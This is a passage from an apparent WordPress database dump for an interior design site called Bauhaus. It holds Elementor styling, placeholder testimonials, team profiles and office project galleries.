.elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:40','2023-05-25 10:18:40','',38,'https://bauhaus.futuremediatrix.com/?p=4757',0,'revision','',0),(4759,2,'2023-05-25 10:20:54','2023-05-25 10:20:54','<h3>our recent work</h3>\n														<h2>\n								Bauhaus Office Projects							</h2>\n							<p> Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.\nKami meyakini bahwa ruang kantor yang dirancang dengan baik dapat meningkatkan produktivitas serta membangun interaksi positif antar karyawan. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"Office-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL09mZmljZS0xLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0yLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0zLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS00LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS01LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS02LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS03LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-8\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS04LmpwZWciLCJzbGlkZXNob3ciOiJhbGwtMDBkOTM5MCJ9\">\n														</a>','Office','','publish','closed','closed','','office','','','2023-09-22 08:39:17','2023-09-22 08:39:17','',0,'https://bauhaus.futuremediatrix.com/?page_id=4759',0,'page','',0),(4760,2,'2023-05-25 10:20:54','2023-05-25 10:20:54','<h3>our recent work</h3>\n<h2>\n								 Introducing outstanding projects</h2>\n<ul>\n 	<li data-filter=\"*\">\n                    All</li>\n 	<li data-slug=\".architect\">\n                    Architect</li>\n 	<li data-slug=\".design\">\n                    Design</li>\n 	<li data-slug=\".interior\">\n                    Interior</li>\n</ul>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\">\nGreater commercial\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\">\nCozy living room\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\">\nRichard Rogers\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\">\nPhilip Johnson\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\">\nDomestic\n</a></h3>\n<!-- Image -->\n<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n</a>\n<!-- Info -->\n<!-- Category -->\n<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>\n<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\">\nBuildings\n</a></h3>\n<h4>no data</h4>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-05-25 10:20:54','2023-05-25 10:20:54','',4759,'https://bauhaus.futuremediatrix.com/?p=4760',0,'revision','',0),(4762,2,'2023-05-25 10:22:05','2023-05-25 10:22:05',' ','','','publish','closed','closed','','4762','','','2023-05-25 10:22:05','2023-05-25 